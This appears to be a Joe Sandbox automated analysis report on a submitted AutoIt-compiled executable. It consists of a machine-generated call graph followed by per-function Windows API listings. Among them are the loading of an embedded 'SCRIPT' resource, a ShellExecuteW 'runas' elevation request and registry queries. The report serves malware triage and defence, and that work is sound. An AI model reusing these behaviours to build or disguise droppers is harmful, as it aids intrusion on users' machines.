API calls 97076->97079 97080 f59047 97077->97080 97081 f590a1 GetLastError 97077->97081 97078->97074 97082 f58fdd 97078->97082 97083 f58e71 97079->97083 97080->97081 97086 f5901e 97080->97086 97084 f59005 97081->97084 97085 f590ae 97081->97085 97082->97077 97087 f58fe3 ReadConsoleW 97082->97087 97088 f58e96 97083->97088 97089 f58e7b 97083->97089 97104 f58e45 __fread_nolock 97084->97104 97133 f4f2a3 20 API calls 2 library calls 97084->97133 97136 f4f2d9 20 API calls _abort 97085->97136 97100 f59083 97086->97100 97101 f5906c 97086->97101 97086->97104 97087->97086 97092 f58fff GetLastError 97087->97092 97132 f59424 28 API calls __fread_nolock 97088->97132 97130 f4f2d9 20 API calls _abort 97089->97130 97092->97084 97093 f529c8 _free 20 API calls 97093->97055 97095 f590b3 97137 f4f2c6 20 API calls _abort 97095->97137 97097 f58e80 97131 f4f2c6 20 API calls _abort 97097->97131 97103 f5909a 97100->97103 97100->97104 97134 f58a61 31 API calls 3 library calls 97101->97134 97135 f588a1 29 API calls __fread_nolock 97103->97135 97104->97093 97106 f5909f 97106->97104 97107->97023 97108->97025 97109->97027 97110->97023 97111->97039 97112->97041 97114 f5f8b5 97113->97114 97115 f5f8a8 97113->97115 97117 f5f8c1 97114->97117 97142 f4f2d9 20 API calls _abort 97114->97142 97141 f4f2d9 20 API calls _abort 97115->97141 97117->97071 97119 f5f8ad 97119->97071 97120 f5f8e2 97143 f527ec 26 API calls _abort 97120->97143 97122->97047 97123->97055 97124->97057 97125->97056 97126->97066 97127->97072 97128->97104 97129->97070 97130->97097 97131->97104 97132->97069 97133->97104 97134->97104 97135->97106 97136->97095 97137->97104 97138->97050 97139->97056 97140->97055 97141->97119 97142->97120 97143->97119 97147 f4e4e8 97144->97147 97146 f9275d 97146->96897 97150 f4e469 97147->97150 97149 f4e505 97149->97146 97151 f4e48c 97150->97151 97152 f4e478 97150->97152 97157 f4e488 __alldvrm 97151->97157 97160 f5333f 11 API calls 2 library calls 97151->97160 97158 f4f2d9 20 API calls _abort 97152->97158 
97154 f4e47d 97159 f527ec 26 API calls _abort 97154->97159 97157->97149 97158->97154 97159->97157 97160->97157 97166 f92e7a 97161->97166 97162 f92d3b 97162->96798 97162->96815 97163 f250f5 40 API calls 97163->97166 97164 f928fe 27 API calls 97164->97166 97165 f2511f 64 API calls 97165->97166 97166->97162 97166->97163 97166->97164 97166->97165 97168 f922d9 97167->97168 97169 f922e7 97167->97169 97170 f4e5eb 29 API calls 97168->97170 97171 f9232c 97169->97171 97172 f4e5eb 29 API calls 97169->97172 97181 f922f0 97169->97181 97170->97169 97196 f92557 97171->97196 97173 f92311 97172->97173 97173->97171 97175 f9231a 97173->97175 97179 f4e678 67 API calls 97175->97179 97175->97181 97176 f92370 97177 f92395 97176->97177 97178 f92374 97176->97178 97200 f92171 97177->97200 97183 f4e678 67 API calls 97178->97183 97184 f92381 97178->97184 97179->97181 97181->96815 97182 f9239d 97186 f923c3 97182->97186 97187 f923a3 97182->97187 97183->97184 97184->97181 97185 f4e678 67 API calls 97184->97185 97185->97181 97207 f923f3 97186->97207 97189 f923b0 97187->97189 97190 f4e678 67 API calls 97187->97190 97189->97181 97191 f4e678 67 API calls 97189->97191 97190->97189 97191->97181 97192 f923de 97192->97181 97195 f4e678 67 API calls 97192->97195 97193 f923ca 97193->97192 97215 f4e678 97193->97215 97195->97181 97197 f9257c 97196->97197 97199 f92565 __fread_nolock 97196->97199 97198 f4e8c4 __fread_nolock 40 API calls 97197->97198 97198->97199 97199->97176 97201 f4ea0c ___std_exception_copy 21 API calls 97200->97201 97202 f9217f 97201->97202 97203 f4ea0c ___std_exception_copy 21 API calls 97202->97203 97204 f92190 97203->97204 97205 f4ea0c ___std_exception_copy 21 API calls 97204->97205 97206 f9219c 97205->97206 97206->97182 97214 f92408 97207->97214 97208 f924c0 97232 f92724 97208->97232 97209 f921cc 40 API calls 97209->97214 97211 f924c7 97211->97193 97214->97208 97214->97209 97214->97211 97228 f92606 97214->97228 97236 f92269 40 API calls 97214->97236 97216 f4e684 
___scrt_is_nonwritable_in_current_image 97215->97216 97217 f4e695 97216->97217 97218 f4e6aa 97216->97218 97310 f4f2d9 20 API calls _abort 97217->97310 97220 f4e6a5 __fread_nolock 97218->97220 97293 f4918d EnterCriticalSection 97218->97293 97220->97192 97222 f4e69a 97311 f527ec 26 API calls _abort 97222->97311 97223 f4e6c6 97294 f4e602 97223->97294 97226 f4e6d1 97312 f4e6ee LeaveCriticalSection __fread_nolock 97226->97312 97229 f92617 97228->97229 97230 f9261d 97228->97230 97229->97230 97237 f926d7 97229->97237 97230->97214 97233 f92731 97232->97233 97235 f92742 97232->97235 97234 f4dbb3 65 API calls 97233->97234 97234->97235 97235->97211 97236->97214 97238 f92714 97237->97238 97239 f92703 97237->97239 97238->97229 97241 f4dbb3 97239->97241 97242 f4dbdd 97241->97242 97243 f4dbc1 97241->97243 97242->97238 97243->97242 97244 f4dbe3 97243->97244 97245 f4dbcd 97243->97245 97250 f4d9cc 97244->97250 97253 f4f2d9 20 API calls _abort 97245->97253 97248 f4dbd2 97254 f527ec 26 API calls _abort 97248->97254 97255 f4d97b 97250->97255 97252 f4d9f0 97252->97242 97253->97248 97254->97242 97256 f4d987 ___scrt_is_nonwritable_in_current_image 97255->97256 97263 f4918d EnterCriticalSection 97256->97263 97258 f4d995 97264 f4d9f4 97258->97264 97262 f4d9b3 __fread_nolock 97262->97252 97263->97258 97272 f549a1 97264->97272 97270 f4d9a2 97271 f4d9c0 LeaveCriticalSection __fread_nolock 97270->97271 97271->97262 97273 f4d955 __fread_nolock 26 API calls 97272->97273 97274 f549b0 97273->97274 97275 f5f89b __fread_nolock 26 API calls 97274->97275 97276 f549b6 97275->97276 97277 f4da09 97276->97277 97278 f53820 __fread_nolock 21 API calls 97276->97278 97281 f4da3a 97277->97281 97279 f54a15 97278->97279 97280 f529c8 _free 20 API calls 97279->97280 97280->97277 97282 f4da24 97281->97282 97285 f4da4c 97281->97285 97292 f54a56 62 API calls 97282->97292 97283 f4da5a 97284 f4f2d9 _free 20 API calls 97283->97284 97286 f4da5f 97284->97286 97285->97282 97285->97283 97290 f4da85 __fread_nolock 
calls 3 library calls 98689->98761 98759 f4f2a3 20 API calls 2 library calls 98690->98759 98691 f60756 GetLastError 98758 f4f2a3 20 API calls 2 library calls 98691->98758 98694 f60704 98694->98688 98694->98691 98757 f6039a CreateFileW 98694->98757 98695 f6079a CloseHandle 98695->98679 98697 f607c3 98695->98697 98760 f4f2d9 20 API calls _abort 98697->98760 98699 f60749 98699->98688 98699->98691 98700 f607f4 98702 f60840 98700->98702 98762 f605ab 72 API calls 4 library calls 98700->98762 98707 f6086d 98702->98707 98763 f6014d 72 API calls 4 library calls 98702->98763 98703 f607c8 98703->98679 98706 f60866 98706->98707 98708 f6087e 98706->98708 98709 f586ae __wsopen_s 29 API calls 98707->98709 98708->98686 98710 f608fc CloseHandle 98708->98710 98709->98686 98764 f6039a CreateFileW 98710->98764 98712 f60927 98713 f6095d 98712->98713 98714 f60931 GetLastError 98712->98714 98713->98686 98765 f4f2a3 20 API calls 2 library calls 98714->98765 98716 f6093d 98766 f55333 21 API calls 3 library calls 98716->98766 98718->98665 98719->98670 98720->98670 98722 f60450 98721->98722 98727 f6046a 98721->98727 98722->98727 98774 f4f2d9 20 API calls _abort 98722->98774 98725 f6045f 98775 f527ec 26 API calls _abort 98725->98775 98767 f603bf 98727->98767 98728 f604a2 98729 f604d1 98728->98729 98776 f4f2d9 20 API calls _abort 98728->98776 98737 f60524 98729->98737 98778 f4d70d 26 API calls 2 library calls 98729->98778 98732 f6051f 98734 f6059e 98732->98734 98732->98737 98733 f604c6 98777 f527ec 26 API calls _abort 98733->98777 98779 f527fc 11 API calls _abort 98734->98779 98737->98674 98737->98675 98738 f605aa 98740 f5522d ___scrt_is_nonwritable_in_current_image 98739->98740 98782 f52f5e EnterCriticalSection 98740->98782 98742 f5527b 98783 f5532a 98742->98783 98743 f55234 98743->98742 98744 f55259 98743->98744 98749 f552c7 EnterCriticalSection 98743->98749 98747 f55000 __wsopen_s 21 API calls 98744->98747 98746 f552a4 __fread_nolock 98746->98678 98748 f5525e 98747->98748 98748->98742 98786 
f55147 EnterCriticalSection 98748->98786 98749->98742 98750 f552d4 LeaveCriticalSection 98749->98750 98750->98743 98752->98694 98753->98679 98754->98686 98755->98685 98756->98679 98757->98699 98758->98679 98759->98695 98760->98703 98761->98700 98762->98702 98763->98706 98764->98712 98765->98716 98766->98713 98769 f603d7 98767->98769 98768 f603f2 98768->98728 98769->98768 98780 f4f2d9 20 API calls _abort 98769->98780 98771 f60416 98781 f527ec 26 API calls _abort 98771->98781 98773 f60421 98773->98728 98774->98725 98775->98727 98776->98733 98777->98729 98778->98732 98779->98738 98780->98771 98781->98773 98782->98743 98787 f52fa6 LeaveCriticalSection 98783->98787 98785 f55331 98785->98746 98786->98742 98787->98785 98788 f21cad SystemParametersInfoW

                                                      Control-flow Graph

                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00F2430D
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                      • GetCurrentProcess.KERNEL32(?,00FBCB64,00000000,?,?), ref: 00F24422
                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F24429
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F24454
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F24466
                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F24474
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F2447B
                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00F244A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                      • API String ID: 3290436268-3101561225
                                                      • Opcode ID: 09683c9dbfb9c0d1fed9c9c3686c6d3cb37a4806824104871cb1cce22acfc6b5
                                                      • Instruction ID: 94e2f75e5102dff3c77dfd1ebd02717761bea9d61ccd7546a02ddd6dce58d13c
                                                      • Opcode Fuzzy Hash: 09683c9dbfb9c0d1fed9c9c3686c6d3cb37a4806824104871cb1cce22acfc6b5
                                                      • Instruction Fuzzy Hash: A0A1B266D0E2DCDFC711D7ADBC816B57FEC7F26310B0849A9D48193A22D2615908FF61

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F250AA,?,?,00000000,00000000), ref: 00F242B2
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F250AA,?,?,00000000,00000000), ref: 00F242C9
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20), ref: 00F635BE
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20), ref: 00F635D3
                                                      • LockResource.KERNEL32(00F250AA,?,?,00F250AA,?,?,00000000,00000000,?,?,?,?,?,?,00F24F20,?), ref: 00F635E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 28b46215802320524dc007a801a36cd5889cf4758e8e837ebdb855a9fb28579c
                                                      • Instruction ID: d89da2396fcae7abe1a8d0ee1aa53e150f9fbaf27b33ec0371400cbe73a85aa5
                                                      • Opcode Fuzzy Hash: 28b46215802320524dc007a801a36cd5889cf4758e8e837ebdb855a9fb28579c
                                                      • Instruction Fuzzy Hash: CA118271600705FFD7218BA6EC88F677BB9EBC5B51F144269F402D6290DBB1EC00AA70

                                                      Control-flow Graph

                                                      APIs
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F22B6B
                                                        • Part of subcall function 00F23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FF1418,?,00F22E7F,?,?,?,00000000), ref: 00F23A78
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00FE2224), ref: 00F62C10
                                                      • ShellExecuteW.SHELL32(00000000,?,?,00FE2224), ref: 00F62C17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                      • String ID: runas
                                                      • API String ID: 448630720-4000483414
                                                      • Opcode ID: a2a8a135fd2850dae299662dc5f0e8e59b998bbaa32324c05fe6277f79eee9f8
                                                      • Instruction ID: a8a5aad38052d65538a696b1c5c087d8f12ccdc7aab662c061082dff8a194dc0
                                                      • Opcode Fuzzy Hash: a2a8a135fd2850dae299662dc5f0e8e59b998bbaa32324c05fe6277f79eee9f8
                                                      • Instruction Fuzzy Hash: C311AF71608269AAC714FF60FC919BE77A8AFD5710F48082DB182570A3CF6D8A09F752
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,00F65222), ref: 00F8DBCE
                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00F8DBDD
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00F8DBEE
                                                      • FindClose.KERNEL32(00000000), ref: 00F8DBFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2695905019-0
                                                      • Opcode ID: 0e25fa3cf85dbdaa70ce0fe62b2808b57f963750289002094fdb2559cf06b09b
                                                      • Instruction ID: 9f8045122bc415a70d964da10c3a3531d68ed7662c46ef35f7ec77decb5b77aa
                                                      • Opcode Fuzzy Hash: 0e25fa3cf85dbdaa70ce0fe62b2808b57f963750289002094fdb2559cf06b09b
                                                      • Instruction Fuzzy Hash: 6BF0ED31810918678620BB7CAC4D8EB37AC9E02334B104702F836C20F0EBB09D94EBD6
                                                      APIs
                                                      • GetInputState.USER32 ref: 00F2D807
                                                      • timeGetTime.WINMM ref: 00F2DA07
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2DB28
                                                      • TranslateMessage.USER32(?), ref: 00F2DB7B
                                                      • DispatchMessageW.USER32(?), ref: 00F2DB89
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2DB9F
                                                      • Sleep.KERNEL32(0000000A), ref: 00F2DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                      • String ID:
                                                      • API String ID: 2189390790-0
                                                      • Opcode ID: 3b87d22a093ca5ce989a0461a248a2483c7ea9e363473f123ed5006abf56c0ed
                                                      • Instruction ID: 3a09e394a8219ab9db8b9bb174f0c7d8156db4c19a5847f6642232f8099cd998
                                                      • Opcode Fuzzy Hash: 3b87d22a093ca5ce989a0461a248a2483c7ea9e363473f123ed5006abf56c0ed
                                                      • Instruction Fuzzy Hash: 60421431A08255DFD728CF24D894BAAB7E4BF85320F14861EF49987291D774E884FF82

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F22D07
                                                      • RegisterClassExW.USER32(00000030), ref: 00F22D31
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F22D42
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00F22D5F
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F22D6F
                                                      • LoadIconW.USER32(000000A9), ref: 00F22D85
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F22D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 7a3e53c6142633cdbc7cccf79403c0e666485781b0bac35332aae8fff7d82e50
                                                      • Instruction ID: 84e2b3c1808d9a311b2c101c6f40222297cf3e4b48ca19732d0573ed3183565f
                                                      • Opcode Fuzzy Hash: 7a3e53c6142633cdbc7cccf79403c0e666485781b0bac35332aae8fff7d82e50
                                                      • Instruction Fuzzy Hash: 1B21C3B591121CEFDB10DFA4E889BEEBBB8FB08700F10421AF551A62A0D7B54544EF91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00F6039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F60704,?,?,00000000,?,00F60704,00000000,0000000C), ref: 00F603B7
                                                      • GetLastError.KERNEL32 ref: 00F6076F
                                                      • __dosmaperr.LIBCMT ref: 00F60776
                                                      • GetFileType.KERNELBASE(00000000), ref: 00F60782
                                                      • GetLastError.KERNEL32 ref: 00F6078C
                                                      • __dosmaperr.LIBCMT ref: 00F60795
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F607B5
                                                      • CloseHandle.KERNEL32(?), ref: 00F608FF
                                                      • GetLastError.KERNEL32 ref: 00F60931
                                                      • __dosmaperr.LIBCMT ref: 00F60938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 818ac49e44ae5b4a05ec733b5505c6a31da57dfd537e9900caa264844cb89747
                                                      • Instruction ID: 84efb5c0743232c984c8a74a28a2dc470ec1afc2933b49864ebd8778c30e28db
                                                      • Opcode Fuzzy Hash: 818ac49e44ae5b4a05ec733b5505c6a31da57dfd537e9900caa264844cb89747
                                                      • Instruction Fuzzy Hash: 28A12432E141088FDF19EF68DC91BAE3BA0EB46320F240159F8159B3D2DB359D16EB91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00F23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FF1418,?,00F22E7F,?,?,?,00000000), ref: 00F23A78
                                                        • Part of subcall function 00F23357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F23379
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F2356A
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F6318D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F631CE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00F63210
                                                      • _wcslen.LIBCMT ref: 00F63277
                                                      • _wcslen.LIBCMT ref: 00F63286
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 98802146-2727554177
                                                      • Opcode ID: 4cc0be0ef11434f1921856e354a0a0404d1ffce94e8f85aee06a8d4edbd747d9
                                                      • Instruction ID: c7e0bd7390dbdb90d4ebf826a9fa0ff96f6e0c92804910ab553104aaf8c16ca8
                                                      • Opcode Fuzzy Hash: 4cc0be0ef11434f1921856e354a0a0404d1ffce94e8f85aee06a8d4edbd747d9
                                                      • Instruction Fuzzy Hash: B671A2B18053199FC314EF69EC819ABBBECFF85750F40042DF54583161EB789A48EB52

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F22B8E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F22B9D
                                                      • LoadIconW.USER32(00000063), ref: 00F22BB3
                                                      • LoadIconW.USER32(000000A4), ref: 00F22BC5
                                                      • LoadIconW.USER32(000000A2), ref: 00F22BD7
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F22BEF
                                                      • RegisterClassExW.USER32(?), ref: 00F22C40
                                                        • Part of subcall function 00F22CD4: GetSysColorBrush.USER32(0000000F), ref: 00F22D07
                                                        • Part of subcall function 00F22CD4: RegisterClassExW.USER32(00000030), ref: 00F22D31
                                                        • Part of subcall function 00F22CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F22D42
                                                        • Part of subcall function 00F22CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F22D5F
                                                        • Part of subcall function 00F22CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F22D6F
                                                        • Part of subcall function 00F22CD4: LoadIconW.USER32(000000A9), ref: 00F22D85
                                                        • Part of subcall function 00F22CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F22D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 6bb601ec385dccdf60d722ad660b86613430b877a730fb570b779a869813f191
                                                      • Instruction ID: fbe7b3243a10236b9dcfb8975fdc440b9e750b3547beaee6e0b015cfc669ca0c
                                                      • Opcode Fuzzy Hash: 6bb601ec385dccdf60d722ad660b86613430b877a730fb570b779a869813f191
                                                      • Instruction Fuzzy Hash: F4212970E0031DEBDB109FA6EC99AAA7FB8FF48B50F14011AF600A66A0D7B50544EF90

                                                       Control-flow Graph

                                                       • Control-flow graph rendered as an image in the original report; only the block list survived extraction. Window procedure at 00F23170 (main path 00F23170-00F2326D, cold path 00F62D9C-00F62E96); its blocks call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus.
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F2316A,?,?), ref: 00F231D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00F2316A,?,?), ref: 00F23204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F23227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F2316A,?,?), ref: 00F23232
                                                      • CreatePopupMenu.USER32 ref: 00F23246
                                                      • PostQuitMessage.USER32(00000000), ref: 00F23267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
